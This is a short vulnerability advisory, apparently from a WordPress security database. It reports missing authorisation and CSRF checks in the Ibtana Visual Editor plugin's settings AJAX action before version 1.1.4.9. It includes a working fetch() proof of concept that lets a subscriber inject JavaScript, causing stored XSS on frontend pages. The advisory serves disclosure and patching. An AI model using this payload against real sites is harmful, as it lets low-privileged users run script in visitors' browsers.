The plugin does not have authorisation and CSRF checks in the ive_save_general_settings AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin’s settings which could lead to Stored Cross-Site Scripting issue. Note: v1.1.4.7 added CSRF check, authorisation was added in 1.1.4.9
fetch(“http://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “action=ive_save_general_settings&ive;_custom_js=alert(/XSS/)”, “method”: “POST”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); The XSS will be triggered in all frontend pages in the Pro version
CPE | Name | Operator | Version |
---|---|---|---|
ibtana-visual-editor | lt | 1.1.4.9 |